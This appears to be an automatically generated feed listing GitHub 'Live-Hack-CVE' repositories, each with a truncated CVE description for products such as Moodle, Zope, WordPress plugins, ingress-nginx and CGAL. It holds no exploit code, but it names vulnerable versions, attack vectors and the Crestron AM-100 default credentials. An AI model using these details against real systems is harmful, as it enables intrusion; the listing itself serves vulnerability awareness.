**Teachers exporting a forum in CSV format could receive a CSV of forums from all courses in some circumstances. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32472](https://github.com/Live-Hack-CVE/CVE-2021-32472) create time: 2022-12-28T01:16:04Z

**This affects all versions of package @cookiex/deep. The global proto object can be polluted using the __proto__ object. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23442](https://github.com/Live-Hack-CVE/CVE-2021-23442) create time: 2022-12-28T01:16:01Z

**This affects all versions of package x-assign. The global proto object can be polluted using the __proto__ object. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23452](https://github.com/Live-Hack-CVE/CVE-2021-23452) create time: 2022-12-28T01:15:58Z

**Zope is an open-source web application server. Zope versions prior to versions 4.6.3 and 5.3 have a remote code execution security issue. In order to be affected, one must use Python 3 for one's Zope deployment, run Zope 4 below version 4.6.3 or Zope 5 below version 5.3, and have the optional `Products.PythonScripts` a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32811](https://github.com/Live-Hack-CVE/CVE-2021-32811) create time: 2022-12-28T01:15:54Z

**This affects the package open-graph before 0.2.6. The function parse could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23419](https://github.com/Live-Hack-CVE/CVE-2021-23419) create time: 2022-12-28T01:15:51Z

**The module `AccessControl` defines security policies for Python code used in restricted code within Zope applications. Restricted code is any code that resides in Zope's object database, such as the contents of `Script (Python)` objects. The policies defined in `AccessControl` severely restrict access to Python modules CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32807](https://github.com/Live-Hack-CVE/CVE-2021-32807) create time: 2022-12-28T01:15:44Z

**A double-free was found in the way 389-ds-base handles virtual attributes context in persistent searches. An attacker could send a series of search requests, forcing the server to behave unexpectedly, and crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4091](https://github.com/Live-Hack-CVE/CVE-2021-4091) create time: 2022-12-28T01:15:40Z

**org/mitre/oauth2/web/OAuthConfirmationController.java in the OpenID Connect server implementation for MITREid Connect through 1.3.3 contains a Mass Assignment (aka Autobinding) vulnerability. This arises due to unsafe usage of the @ModelAttribute annotation during the OAuth authorization flow, in which HTTP request par CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27582](https://github.com/Live-Hack-CVE/CVE-2021-27582) create time: 2022-12-28T01:15:37Z

**The merge-deep library before 3.0.3 for Node.js can be tricked into overwriting properties of Object.prototype or adding new properties to it. These properties are then inherited by every object in the program, thus facilitating prototype-pollution attacks against applications using this library. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26707](https://github.com/Live-Hack-CVE/CVE-2021-26707) create time: 2022-12-28T01:15:33Z

**A flaw was found in htmldoc in v1.9.12. Heap buffer overflow in render_table_row(),in ps-pdf.cxx may lead to arbitrary code execution and denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26259](https://github.com/Live-Hack-CVE/CVE-2021-26259) create time: 2022-12-28T01:13:09Z

**A denial-of-service risk was identified in the draft files area, due to it not respecting user file upload limits. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32476](https://github.com/Live-Hack-CVE/CVE-2021-32476) create time: 2022-12-28T01:10:01Z

**In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46828](https://github.com/Live-Hack-CVE/CVE-2021-46828) create time: 2022-12-28T01:09:57Z

**In Citrix XenMobile Server through 10.12 RP9, there is an Authenticated Directory Traversal vulnerability, leading to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44519](https://github.com/Live-Hack-CVE/CVE-2021-44519) create time: 2022-12-28T01:06:56Z

**The Advanced Page Visit Counter WordPress plugin before 6.1.6 does not escape the artID parameter before using it in a SQL statement in the apvc_reset_count_art AJAX action, available to any authenticated user, leading to a SQL injection CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24957](https://github.com/Live-Hack-CVE/CVE-2021-24957) create time: 2022-12-28T01:06:49Z

**A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25745](https://github.com/Live-Hack-CVE/CVE-2021-25745) create time: 2022-12-28T01:06:45Z

**A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has acces CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25746](https://github.com/Live-Hack-CVE/CVE-2021-25746) create time: 2022-12-28T00:35:03Z

**There is a flaw in RPM's signature functionality. OpenPGP subkeys are associated with a primary key via a "binding signature." RPM does not check the binding signature of subkeys prior to importing them. If an attacker is able to add or socially engineer another party to add a malicious subkey to a legitimate public ke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3521](https://github.com/Live-Hack-CVE/CVE-2021-3521) create time: 2022-12-28T00:33:49Z

**A locking protection bypass flaw was found in some versions of gnome-shell as shipped within CentOS Stream 8, when the "Application menu" or "Window list" GNOME extensions are enabled. This flaw allows a physical attacker who has access to a locked system to kill existing applications and start new ones as the locked u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20315](https://github.com/Live-Hack-CVE/CVE-2021-20315) create time: 2022-12-28T00:33:32Z

**An incorrect default permissions vulnerability was found in the mig-controller. Due to an incorrect cluster namespaces handling an attacker may be able to migrate a malicious workload to the target cluster, impacting confidentiality, integrity, and availability of the services located on that cluster. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3948](https://github.com/Live-Hack-CVE/CVE-2021-3948) create time: 2022-12-28T00:33:25Z

**Heap out-of-bounds read in Clickhouse's LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value ('offset') is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42387](https://github.com/Live-Hack-CVE/CVE-2021-42387) create time: 2022-12-28T00:31:48Z

**OpenCart 3.0.3.7 allows users to obtain database information or read server files through SQL injection in the background. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37823](https://github.com/Live-Hack-CVE/CVE-2021-37823) create time: 2022-12-28T00:31:29Z

**An improper link resolution flaw can occur while extracting an archive leading to changing modes, times, access control lists, and flags of a file outside of the archive. An attacker may provide a malicious archive to a victim user, who would trigger this flaw when trying to extract the archive. A local attacker may us CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31566](https://github.com/Live-Hack-CVE/CVE-2021-31566) create time: 2022-12-28T00:30:06Z

**An improper link resolution flaw while extracting an archive can lead to changing the access control list (ACL) of the target of the link. An attacker may provide a malicious archive to a victim user, who would trigger this flaw when trying to extract the archive. A local attacker may use this flaw to change the ACL of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23177](https://github.com/Live-Hack-CVE/CVE-2021-23177) create time: 2022-12-28T00:30:03Z

**models/metadata.py in the pikepdf package 1.3.0 through 2.9.2 for Python allows XXE when parsing XMP metadata entries. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29421](https://github.com/Live-Hack-CVE/CVE-2021-29421) create time: 2022-12-28T00:29:39Z

**Existing CommBuffer checks in SmmEntryPoint will not catch underflow when computing BufferSize. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38578](https://github.com/Live-Hack-CVE/CVE-2021-38578) create time: 2022-12-28T00:29:35Z

**Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary director CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24823](https://github.com/Live-Hack-CVE/CVE-2022-24823) create time: 2022-12-28T00:29:32Z

**Multiple command injections and stack-based buffer overflows vulnerabilities in the SubNet_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26727](https://github.com/Live-Hack-CVE/CVE-2021-26727) create time: 2022-12-28T00:27:02Z

**Command injection and multiple stack-based buffer overflows vulnerabilities in the Login_handler_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26729](https://github.com/Live-Hack-CVE/CVE-2021-26729) create time: 2022-12-28T00:26:59Z

**NULL Pointer Dereference in function vim_regexec_string at regexp.c:2733 in GitHub repository vim/vim prior to 8.2.4938. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2733 allows attackers to cause a denial of service (application crash) via a crafted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1674](https://github.com/Live-Hack-CVE/CVE-2022-1674) create time: 2022-12-28T01:16:08Z

**An information leak flaw was found due to uninitialized memory in the Linux kernel's TIPC protocol subsystem, in the way a user sends a TIPC datagram to one or more destinations. This flaw allows a local user to read some kernel memory. This issue is limited to no more than 7 bytes, and the user cannot control what is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0382](https://github.com/Live-Hack-CVE/CVE-2022-0382) create time: 2022-12-28T01:15:15Z

**The OWM Weather WordPress plugin before 5.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as contributor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3769](https://github.com/Live-Hack-CVE/CVE-2022-3769) create time: 2022-12-28T01:12:58Z

**The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3768](https://github.com/Live-Hack-CVE/CVE-2022-3768) create time: 2022-12-28T01:12:55Z

**The Showing URL in QR Code WordPress plugin through 0.0.1 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin or editor add Stored XSS payloads via a CSRF attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3847](https://github.com/Live-Hack-CVE/CVE-2022-3847) create time: 2022-12-28T01:12:51Z

**The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3849](https://github.com/Live-Hack-CVE/CVE-2022-3849) create time: 2022-12-28T01:12:41Z

**The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3848](https://github.com/Live-Hack-CVE/CVE-2022-3848) create time: 2022-12-28T01:12:37Z

**The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3865](https://github.com/Live-Hack-CVE/CVE-2022-3865) create time: 2022-12-28T01:12:34Z

**PostgreSQL JDBC Driver (PgJDBC for short) allows Java programs to connect to a PostgreSQL database using standard, database independent Java code. The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement ter CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31197](https://github.com/Live-Hack-CVE/CVE-2022-31197) create time: 2022-12-28T01:09:29Z

**A memory corruption vulnerability exists in the httpd unescape functionality of Asuswrt prior to 3.0.0.4.386_48706 and Asuswrt-Merlin New Gen prior to 386.7.. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26376](https://github.com/Live-Hack-CVE/CVE-2022-26376) create time: 2022-12-28T01:09:25Z

**The authfile directive in the booth config file is ignored, preventing use of authentication in communications from node to node. As a result, nodes that do not have the correct authentication key are not prevented from communicating with other nodes in the cluster. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2553](https://github.com/Live-Hack-CVE/CVE-2022-2553) create time: 2022-12-28T01:09:22Z

**A memory corruption vulnerability exists in the httpd unescape functionality of DD-WRT Revision 32270 - Revision 48599. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27631](https://github.com/Live-Hack-CVE/CVE-2022-27631) create time: 2022-12-28T01:09:18Z

**A vulnerability was found in PostgreSQL. This attack requires permission to create non-temporary objects in at least one schema, the ability to lure or wait for an administrator to create or update an affected extension in that schema, and the ability to lure or wait for a victim to use the object targeted in CREATE OR CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2625](https://github.com/Live-Hack-CVE/CVE-2022-2625) create time: 2022-12-28T01:09:12Z

**A vulnerability related to weak permissions was detected in Avaya Aura Application Enablement Services web application, allowing an administrative user to modify accounts leading to execution of arbitrary code as the root user. This issue affects Application Enablement Services versions 8.0.0.0 through 8.1.3.4 and 10.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2975](https://github.com/Live-Hack-CVE/CVE-2022-2975) create time: 2022-12-28T01:08:54Z

**MyBB is a free and open source forum software. The _Mail Settings_ ? Additional Parameters for PHP's mail() function mail_parameters setting value, in connection with the configured mail program's options and behavior, may allow access to sensitive information and Remote Code Execution (RCE). The vulnerable module requ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39265](https://github.com/Live-Hack-CVE/CVE-2022-39265) create time: 2022-12-28T01:08:50Z

**Citrix XenMobile Server 10.12 through RP11, 10.13 through RP7, and 10.14 through RP4 allows Command Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26151](https://github.com/Live-Hack-CVE/CVE-2022-26151) create time: 2022-12-28T01:07:03Z

**Notable before 1.9.0-beta.8 doesn't effectively prevent the opening of executable files when clicking on a link. There is improper validation of the file URI scheme. A hyperlink to an SMB share could lead to execution of an arbitrary program (or theft of NTLM credentials via an SMB relay attack, because the application CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29281](https://github.com/Live-Hack-CVE/CVE-2022-29281) create time: 2022-12-28T01:06:59Z

**A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29548](https://github.com/Live-Hack-CVE/CVE-2022-29548) create time: 2022-12-28T01:06:52Z

**xterm before 375 allows code execution via font ops, e.g., because an OSC 50 response may have Ctrl-g and therefore lead to command execution within the vi line-editing mode of Zsh. NOTE: font ops are not allowed in the xterm default configurations of some Linux distributions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45063](https://github.com/Live-Hack-CVE/CVE-2022-45063) create time: 2022-12-28T01:06:42Z

**A logic issue was addressed with improved checks. This issue is fixed in tvOS 16.1, iOS 15.7.1 and iPadOS 15.7.1, macOS Ventura 13, watchOS 9.1, iOS 16.1 and iPadOS 16, macOS Monterey 12.6.1. An app may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42801](https://github.com/Live-Hack-CVE/CVE-2022-42801) create time: 2022-12-28T01:06:38Z

**An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3821](https://github.com/Live-Hack-CVE/CVE-2022-3821) create time: 2022-12-28T01:06:35Z

**An HTTP Request Forgery issue was discovered in Varnish Cache 5.x and 6.x before 6.0.11, 7.x before 7.1.2, and 7.2.x before 7.2.1. An attacker may introduce characters through HTTP/2 pseudo-headers that are invalid in the context of an HTTP/1 request line, causing the Varnish server to produce invalid HTTP/1 requests t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45060](https://github.com/Live-Hack-CVE/CVE-2022-45060) create time: 2022-12-28T01:06:32Z

**An issue was discovered in Varnish Cache 7.x before 7.1.2 and 7.2.x before 7.2.1. A request smuggling attack can be performed on Varnish Cache servers by requesting that certain headers are made hop-by-hop, preventing the Varnish Cache servers from forwarding critical headers to the backend. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45059](https://github.com/Live-Hack-CVE/CVE-2022-45059) create time: 2022-12-28T01:06:28Z

**An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the undocumented get_file_transfer_type method CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42965](https://github.com/Live-Hack-CVE/CVE-2022-42965) create time: 2022-12-28T01:06:24Z

**Silverstripe silverstripe/framework through 4.11 allows XSS (issue 1 of 2) via JavaScript payload to the href attribute of a link by splitting a javascript URL with white space characters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37429](https://github.com/Live-Hack-CVE/CVE-2022-37429) create time: 2022-12-28T01:06:20Z

**Multiple W&T products of the Comserver Series use a small number space for allocating sessions ids. After login of an user an unathenticated remote attacker can brute force the users session id and get access to his account on the the device. As the user needs to log in for the attack to be successful a user interactio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42787](https://github.com/Live-Hack-CVE/CVE-2022-42787) create time: 2022-12-28T01:06:10Z

**RubyGems is a package registry used to supply software for the Ruby language ecosystem. An ordering mistake in the code that accepts gem uploads allowed some gems (with platforms ending in numbers, like `arm64-darwin-21`) to be temporarily replaced in the CDN cache by a malicious package. The bug has been patched, and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29218](https://github.com/Live-Hack-CVE/CVE-2022-29218) create time: 2022-12-28T01:05:25Z

**NuGet Client Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41032](https://github.com/Live-Hack-CVE/CVE-2022-41032) create time: 2022-12-28T01:05:21Z

**** DISPUTED ** Prototype pollution vulnerability in function DEFNODE in ast.js in mishoo UglifyJS 3.13.2 via the name variable in ast.js. NOTE: the vendor considers this an invalid report. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37598](https://github.com/Live-Hack-CVE/CVE-2022-37598) create time: 2022-12-28T01:05:18Z

**In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43680](https://github.com/Live-Hack-CVE/CVE-2022-43680) create time: 2022-12-28T01:05:15Z

**The AMQP 0-8, 0-9, 0-91, and 0-10 connection handling in Apache Qpid Java before 6.0.3 might allow remote attackers to bypass authentication and consequently perform actions via vectors related to connection state logging. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4432](https://github.com/Live-Hack-CVE/CVE-2016-4432) create time: 2022-12-27T22:21:16Z

**Possible cross-site scripting vulnerability in libxml after commit 960f0e2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3709](https://github.com/Live-Hack-CVE/CVE-2016-3709) create time: 2022-12-27T22:21:13Z

**Adobe Acrobat and Reader versions 2020.009.20074 and earlier, 2020.001.30002, 2017.011.30171 and earlier, and 2015.006.30523 and earlier have an use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9715](https://github.com/Live-Hack-CVE/CVE-2020-9715) create time: 2022-12-27T22:23:59Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3284](https://github.com/Live-Hack-CVE/CVE-2018-3284) create time: 2022-12-27T23:00:23Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3174](https://github.com/Live-Hack-CVE/CVE-2018-3174) create time: 2022-12-27T22:29:42Z

**SMTP MITM refers to a malicious actor setting up an SMTP proxy server between the UniFi Controller version <= 5.10.21 and their actual SMTP server to record their SMTP credentials for malicious use later. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5456](https://github.com/Live-Hack-CVE/CVE-2019-5456) create time: 2022-12-27T23:02:01Z

**IBM Daeja ViewONE Professional, Standard & Virtual 5.0.5 and 5.0.6 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 163620. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4456](https://github.com/Live-Hack-CVE/CVE-2019-4456) create time: 2022-12-27T23:01:56Z

**Bypassing lock protection exists in Nextcloud Android app 3.6.0 when creating a multi-account and aborting the process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5455](https://github.com/Live-Hack-CVE/CVE-2019-5455) create time: 2022-12-27T23:01:53Z

**Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 stores usernames, passwords, and other configuration options in the file generated via the "export configuration" feature. The configuration file is encrypted using the awenc binary. The same binary can be used to decrypt any configuration file sinc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3938](https://github.com/Live-Hack-CVE/CVE-2019-3938) create time: 2022-12-27T23:01:50Z

**Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 use default credentials admin/admin and moderator/moderator for the web interface. An unauthenticated, remote attacker can use these credentials to gain privileged access to the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3939](https://github.com/Live-Hack-CVE/CVE-2019-3939) create time: 2022-12-27T23:01:46Z

**Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 allows anyone to act as a moderator to a slide show via crafted HTTP POST requests to conference.cgi. A remote, unauthenticated attacker can use this vulnerability to start, stop, and disconnect active slideshows. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3935](https://github.com/Live-Hack-CVE/CVE-2019-3935) create time: 2022-12-27T23:01:42Z

**Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to authentication bypass due to a hard-coded password in return.tgi. A remote, unauthenticated attacker can use this vulnerability to control external devices via the uart_bridge. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3932](https://github.com/Live-Hack-CVE/CVE-2019-3932) create time: 2022-12-27T23:01:36Z

**IBM Robotic Process Automation with Automation Anywhere 11 could allow an attacker to obtain sensitive information due to missing authentication in Ignite nodes. IBM X-Force ID: 161412. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4337](https://github.com/Live-Hack-CVE/CVE-2019-4337) create time: 2022-12-27T23:01:06Z

**IBM Robotic Process Automation with Automation Anywhere 11 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 161411. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4336](https://github.com/Live-Hack-CVE/CVE-2019-4336) create time: 2022-12-27T23:00:55Z

**IBM Robotic Process Automation with Automation Anywhere 11 could allow a remote authenticated attacker to conduct an LDAP injection. By using a specially crafted request, an attacker could exploit this vulnerability to make unauthorized queries or modify the LDAP content. IBM X-Force ID: 160761. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4297](https://github.com/Live-Hack-CVE/CVE-2019-4297) create time: 2022-12-27T23:00:51Z

**Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the "xlink:href" attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17566](https://github.com/Live-Hack-CVE/CVE-2019-17566) create time: 2022-12-27T23:00:48Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.43 and prior, 5.7.25 and prior and 8.0.15 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise M CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2614](https://github.com/Live-Hack-CVE/CVE-2019-2614) create time: 2022-12-27T22:28:10Z

**IBM Security Directory Server 6.4.0 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 165178. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4520](https://github.com/Live-Hack-CVE/CVE-2019-4520) create time: 2022-12-27T22:18:51Z

**IBM Security Directory Server 6.4.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4538](https://github.com/Live-Hack-CVE/CVE-2019-4538) create time: 2022-12-27T22:18:48Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28614](https://github.com/Live-Hack-CVE/CVE-2020-28614) create time: 2022-12-27T23:11:25Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28613](https://github.com/Live-Hack-CVE/CVE-2020-28613) create time: 2022-12-27T23:11:22Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28612](https://github.com/Live-Hack-CVE/CVE-2020-28612) create time: 2022-12-27T23:11:18Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28611](https://github.com/Live-Hack-CVE/CVE-2020-28611) create time: 2022-12-27T23:11:14Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28608](https://github.com/Live-Hack-CVE/CVE-2020-28608) create time: 2022-12-27T23:11:11Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28607](https://github.com/Live-Hack-CVE/CVE-2020-28607) create time: 2022-12-27T23:10:49Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28606](https://github.com/Live-Hack-CVE/CVE-2020-28606) create time: 2022-12-27T23:10:45Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28605](https://github.com/Live-Hack-CVE/CVE-2020-28605) create time: 2022-12-27T23:10:42Z

